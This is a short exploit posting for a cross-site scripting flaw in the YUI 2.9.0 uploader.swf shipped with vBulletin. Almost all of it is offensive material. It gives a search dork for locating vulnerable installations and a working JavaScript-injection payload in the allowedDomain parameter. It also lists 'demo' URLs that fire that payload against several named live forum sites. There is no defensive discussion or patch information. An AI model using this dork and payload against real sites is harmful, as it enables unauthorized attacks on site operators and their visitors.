Kod:
Exploit title:vBulletin YUI 2.9.0 Cross Site Scripting vulnerability
Tested:KaliLinux
Dork:inurl:"clientscript/yui/uploader/assets/"
Exploit:
http://test.com/[PATH]/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf
Demo:
http://fansfoot.com/forum/core/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf
http://www.liveworkshop.com/forums/core/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf
http://www.mjjcommunity.com/forum/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf
http://www.wivesbehindthebadge.org/forums/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf
